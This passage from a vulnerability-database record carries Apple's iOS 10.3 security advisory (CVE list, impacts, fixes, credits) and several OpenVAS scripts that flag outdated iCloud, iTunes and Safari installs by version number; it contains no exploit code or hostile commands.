Description: An issue existed in SQLite deletion. This issue was addressed through improved SQLite cleanup.



CVE-2017-2384



**Safari**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites



Description: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.



CVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC



**Safari**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Visiting a malicious website by clicking a link may lead to user interface spoofing



Description: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.



CVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)



**Safari Reader**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting



Description: Multiple validation issues were addressed through improved input sanitization.



CVE-2017-2393: Erling Ellingsen



**SafariViewController**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Cache state is not properly kept in sync between Safari and SafariViewController when a user clears Safari cache



Description: An issue existed in clearing Safari cache information from SafariViewController. This issue was addressed by improving cache state handling.



CVE-2017-2400: Abhinav Bansal of Zscaler, Inc.



**Sandbox Profiles**



Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation



Impact: A malicious application may be able to access the iCloud user record of a signed in user



Description: An access issue was addressed through additional sandbox restrictions on third party applications.



CVE-2017-6976: George Dan (@theninjaprawn)



Entry added August 1, 2017



**Security**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed



Description: An validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.



CVE-2017-2423: an anonymous researcher



**Security**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: An application may be able to execute arbitrary code with root privileges



Description: A buffer overflow was addressed through improved bounds checking.



CVE-2017-2451: Alex Radocea of Longterm Security, Inc.



**Security**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution



Description: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.



CVE-2017-2485: Aleksandar Nikolic of Cisco Talos



**Siri**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Siri might reveal text message contents while the device is locked



Description: An insufficient locking issue was addressed with improved state management.



CVE-2017-2452: Hunter Byrnes



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution



Description: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.



CVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Visiting a malicious website may lead to address bar spoofing



Description: An inconsistent user interface issue was addressed through improved state management.



CVE-2017-2486: redrain of light4freedom



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may exfiltrate data cross-origin



Description: A prototype access issue was addressed through improved exception handling.



CVE-2017-2386: Andr\u00e9 Bargull



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved input validation.



CVE-2017-2394: Apple



CVE-2017-2396: Apple



CVE-2016-9642: Gustavo Grieco



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved memory handling.



CVE-2017-2395: Apple



CVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative



CVE-2017-2455: Ivan Fratric of Google Project Zero



CVE-2017-2457: lokihardt of Google Project Zero



CVE-2017-2459: Ivan Fratric of Google Project Zero



CVE-2017-2460: Ivan Fratric of Google Project Zero



CVE-2017-2464: Jeonghoon Shin, Natalie Silvanovich of Google Project Zero



CVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab



CVE-2017-2466: Ivan Fratric of Google Project Zero



CVE-2017-2468: lokihardt of Google Project Zero



CVE-2017-2469: lokihardt of Google Project Zero



CVE-2017-2470: lokihardt of Google Project Zero



CVE-2017-2476: Ivan Fratric of Google Project Zero



CVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative



Entry updated June 20, 2017



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: A type confusion issue was addressed through improved memory handling.



CVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy



Description: An access issue existed in Content Security Policy. This issue was addressed through improved access restrictions.



CVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may lead to high memory consumption



Description: An uncontrolled resource consumption issue was addressed through improved regex processing.



CVE-2016-9643: Gustavo Grieco



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may result in the disclosure of process memory



Description: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.



CVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2433: Apple



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may exfiltrate data cross-origin



Description: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.



CVE-2017-2364: lokihardt of Google Project Zero



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: A malicious website may exfiltrate data cross-origin



Description: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.



CVE-2017-2367: lokihardt of Google Project Zero



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may lead to universal cross site scripting



Description: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.



CVE-2017-2445: lokihardt of Google Project Zero



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.



CVE-2017-2446: Natalie Silvanovich of Google Project Zero



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Visiting a maliciously crafted website may compromise user information



Description: A memory corruption issue was addressed through improved memory handling.



CVE-2017-2447: Natalie Silvanovich of Google Project Zero



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved memory handling.



CVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative



Entry added March 28, 2017



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: A use after free issue was addressed through improved memory management.



CVE-2017-2471: Ivan Fratric of Google Project Zero



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may lead to universal cross site scripting



Description: A logic issue existed in frame handling. This issue was addressed through improved state management.



CVE-2017-2475: lokihardt of Google Project Zero



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may exfiltrate data cross-origin



Description: A validation issue existed in element handling. This issue was addressed through improved validation.



CVE-2017-2479: lokihardt of Google Project Zero



Entry added March 28, 2017



**WebKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may exfiltrate data cross-origin



Description: A validation issue existed in element handling. This issue was addressed through improved validation.



CVE-2017-2480: lokihardt of Google Project Zero



CVE-2017-2493: lokihardt of Google Project Zero



Entry updated April 24, 2017



**WebKit JavaScript Bindings**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may exfiltrate data cross-origin



Description: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.



CVE-2017-2442: lokihardt of Google Project Zero



**WebKit Web Inspector**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Closing a window while paused in the debugger may lead to unexpected application termination



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2377: Vicki Pfau



**WebKit Web Inspector**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2405: Apple



![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)



## Additional recognition



**XNU**



We would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.



**WebKit**



We would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.



**Safari**



We would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.



**Settings**



We would like to acknowledge Adi Sharabani and Yair Amit of Skycure for their assistance.

", "edition": 1, "modified": "2017-08-01T06:52:17", "published": "2017-08-01T06:52:17", "id": "APPLE:HT207617", "href": "https://support.apple.com/kb/HT207617", "title": "About the security content of iOS 10.3 - Apple Support", "type": "apple", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-07-17T14:20:34", "description": "This host is installed with Apple iCloud

and is prone to multiple vulnerabilities.", "edition": 7, "published": "2017-05-16T00:00:00", "title": "Apple iCloud Multiple Vulnerabilities-HT207607 (Windows)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2479", "CVE-2017-2480", "CVE-2017-5029", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2383"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310810983", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810983", "sourceData": "###############################################################################

# OpenVAS Vulnerability Test

#

# Apple iCloud Multiple Vulnerabilities-HT207607 (Windows)

#

# Authors:

# Rinu Kuriakose <krinu@secpod.com>

#

# Copyright:

# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net

#

# This program is free software; you can redistribute it and/or modify

# it under the terms of the GNU General Public License version 2

# (or any later version), as published by the Free Software Foundation.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

###############################################################################



CPE = \"cpe:/a:apple:icloud\";



if(description)

{

script_oid(\"1.3.6.1.4.1.25623.1.0.810983\");

script_version(\"2019-07-05T08:56:43+0000\");

script_cve_id(\"CVE-2017-2493\", \"CVE-2017-2480\", \"CVE-2017-2479\", \"CVE-2017-2463\",

\"CVE-2017-5029\", \"CVE-2017-2383\");

script_tag(name:\"cvss_base\", value:\"6.8\");

script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");

script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");

script_tag(name:\"creation_date\", value:\"2017-05-16 14:51:38 +0530 (Tue, 16 May 2017)\");

script_name(\"Apple iCloud Multiple Vulnerabilities-HT207607 (Windows)\");



script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud

and is prone to multiple vulnerabilities.\");



script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");



script_tag(name:\"insight\", value:\"Multiple flaws are due to,



- A validation issue existed in element handling.



- Multiple memory corruption issues.



- Poor certificate handling.\");



script_tag(name:\"impact\", value:\"Successful exploitation will allow

attackers to execute arbitrary code, track a user's activity and exfiltrate

data cross-origin.\");



script_tag(name:\"affected\", value:\"Apple iCloud versions before 6.2

on Windows.\");



script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 6.2 or later.\");



script_tag(name:\"solution_type\", value:\"VendorFix\");

script_tag(name:\"qod_type\", value:\"registry\");

script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207607\");

script_category(ACT_GATHER_INFO);

script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");

script_family(\"General\");

script_dependencies(\"gb_apple_icloud_detect_win.nasl\");

script_mandatory_keys(\"apple/icloud/Win/Ver\");

exit(0);

}



include(\"host_details.inc\");

include(\"version_func.inc\");



if(!icVer = get_app_version(cpe:CPE)){

exit(0);

}



if(version_is_less(version:icVer, test_version:\"6.2\"))

{

report = report_fixed_ver(installed_version:icVer, fixed_version:\"6.2\");

security_message(data:report);

exit(0);

}

", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-03T20:31:03", "description": "This host is installed with Apple iTunes

and is prone to multiple vulnerabilities.", "edition": 9, "published": "2017-03-30T00:00:00", "title": "Apple iTunes Multiple Vulnerabilities-HT207599 (Windows)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2479", "CVE-2012-1148", "CVE-2012-1147", "CVE-2015-3415", "CVE-2017-2480", "CVE-2015-3717", "CVE-2016-5300", "CVE-2015-1283", "CVE-2012-6702", "CVE-2016-0718", "CVE-2016-6153", "CVE-2015-3416", "CVE-2017-5029", "CVE-2015-3414", "CVE-2009-3720", "CVE-2015-6607", "CVE-2009-3270", "CVE-2009-3560", "CVE-2017-2463", "CVE-2016-4472", "CVE-2013-7443", "CVE-2017-2383"], "modified": "2020-02-28T00:00:00", "id": "OPENVAS:1361412562310810724", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810724", "sourceData": "###############################################################################

# OpenVAS Vulnerability Test

#

# Apple iTunes Multiple Vulnerabilities-HT207599 (Windows)

#

# Authors:

# Antu Sanadi <santu@secpod.com>

#

# Copyright:

# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net

#

# This program is free software; you can redistribute it and/or modify

# it under the terms of the GNU General Public License version 2

# (or any later version), as published by the Free Software Foundation.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

###############################################################################



CPE = \"cpe:/a:apple:itunes\";



if(description)

{

script_oid(\"1.3.6.1.4.1.25623.1.0.810724\");

script_version(\"2020-02-28T13:41:47+0000\");

script_cve_id(\"CVE-2009-3270\", \"CVE-2009-3560\", \"CVE-2009-3720\", \"CVE-2012-1147\",

\"CVE-2012-1148\", \"CVE-2012-6702\", \"CVE-2013-7443\", \"CVE-2015-1283\",

\"CVE-2015-3414\", \"CVE-2015-3415\", \"CVE-2015-3416\", \"CVE-2015-3717\",

\"CVE-2015-6607\", \"CVE-2016-0718\", \"CVE-2016-4472\", \"CVE-2016-5300\",

\"CVE-2016-6153\", \"CVE-2017-2383\", \"CVE-2017-2463\", \"CVE-2017-2479\",

\"CVE-2017-2480\", \"CVE-2017-5029\");

script_bugtraq_id(74228);

script_tag(name:\"cvss_base\", value:\"7.8\");

script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");

script_tag(name:\"last_modification\", value:\"2020-02-28 13:41:47 +0000 (Fri, 28 Feb 2020)\");

script_tag(name:\"creation_date\", value:\"2017-03-30 17:37:29 +0530 (Thu, 30 Mar 2017)\");

script_name(\"Apple iTunes Multiple Vulnerabilities-HT207599 (Windows)\");



script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes

and is prone to multiple vulnerabilities.\");



script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");



script_tag(name:\"insight\", value:\"Multiple flaws are due to,



- A client certificate was sent in plaintext. This issue was addressed

through improved certificate handling.



- The multiple issues existed in SQLite.



- The multiple issues existed in expat.



- The multiple memory corruption issues were addressed through

improved memory handling.



- The processing maliciously crafted web content may lead to arbitrary

code execution.



- The processing maliciously crafted web content may exfiltrate data

cross-origin.\");



script_tag(name:\"impact\", value:\"Successful exploitation will allow remote

attackers to execute arbitrary code, cause unexpected application termination

and disclose sensitive information.\");



script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.6 on Windows.\");



script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.6.4 or later.\");



script_tag(name:\"solution_type\", value:\"VendorFix\");

script_tag(name:\"qod_type\", value:\"registry\");

script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207599\");

script_category(ACT_GATHER_INFO);

script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");

script_family(\"General\");

script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");

script_mandatory_keys(\"iTunes/Win/Installed\");



exit(0);

}



include(\"host_details.inc\");

include(\"version_func.inc\");



if(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))

exit(0);



vers = infos[\"version\"];

path = infos[\"location\"];



if(version_is_less(version:vers, test_version:\"12.6\")) {

report = report_fixed_ver(installed_version:vers, fixed_version:\"12.6\", install_path:path);

security_message(port:0, data:report);

exit(0);

}



exit(99);

", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:20", "description": "This host is installed with Apple Safari

and is prone to multiple vulnerabilities.", "edition": 8, "published": "2017-03-31T00:00:00", "title": "Apple Safari Multiple Vulnerabilities-HT207600", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9643", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2442", "CVE-2017-2395", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2454", "CVE-2017-7071", "CVE-2017-2471", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2465", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2419", "CVE-2017-2377", "CVE-2017-2466", "CVE-2017-2364", "CVE-2017-2481", "CVE-2017-2453", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2424", "CVE-2017-2394", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2445", "CVE-2017-2476", "CVE-2017-2385"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310810727", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810727", "sourceData": "###############################################################################

# OpenVAS Vulnerability Test

#

# Apple Safari Multiple Vulnerabilities-HT207600

#

# Authors:

# Antu Sanadi <santu@secpod.com>

#

# Copyright:

# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net

#

# This program is free software; you can redistribute it and/or modify

# it under the terms of the GNU General Public License version 2

# (or any later version), as published by the Free Software Foundation.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

###############################################################################



CPE = \"cpe:/a:apple:safari\";



if(description)

{

script_oid(\"1.3.6.1.4.1.25623.1.0.810727\");

script_version(\"2019-05-17T10:45:27+0000\");

script_cve_id(\"CVE-2016-9642\", \"CVE-2016-9643\", \"CVE-2017-2364\", \"CVE-2017-2367\",

\"CVE-2017-2377\", \"CVE-2017-2378\", \"CVE-2017-2385\", \"CVE-2017-2386\",

\"CVE-2017-2389\", \"CVE-2017-2394\", \"CVE-2017-2395\", \"CVE-2017-2396\",

\"CVE-2017-2405\", \"CVE-2017-2415\", \"CVE-2017-2419\", \"CVE-2017-2424\",

\"CVE-2017-2433\", \"CVE-2017-2442\", \"CVE-2017-2445\", \"CVE-2017-2446\",

\"CVE-2017-2447\", \"CVE-2017-2453\", \"CVE-2017-2454\", \"CVE-2017-2455\",

\"CVE-2017-2459\", \"CVE-2017-2460\", \"CVE-2017-2463\", \"CVE-2017-2464\",

\"CVE-2017-2465\", \"CVE-2017-2466\", \"CVE-2017-2468\", \"CVE-2017-2469\",

\"CVE-2017-2470\", \"CVE-2017-2471\", \"CVE-2017-2475\", \"CVE-2017-2476\",

\"CVE-2017-2479\", \"CVE-2017-2480\", \"CVE-2017-2481\", \"CVE-2017-7071\");

script_bugtraq_id(94554, 94559, 95725, 97130, 97129, 97136, 97143, 97176, 97133,

100613);

script_tag(name:\"cvss_base\", value:\"6.8\");

script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");

script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");

script_tag(name:\"creation_date\", value:\"2017-03-31 16:41:59 +0530 (Fri, 31 Mar 2017)\");

script_name(\"Apple Safari Multiple Vulnerabilities-HT207600\");



script_tag(name:\"summary\", value:\"This host is installed with Apple Safari

and is prone to multiple vulnerabilities.\");



script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");



script_tag(name:\"insight\", value:\"Multiple flaws exists due to,



- Multiple memory corruption issues,



- A state management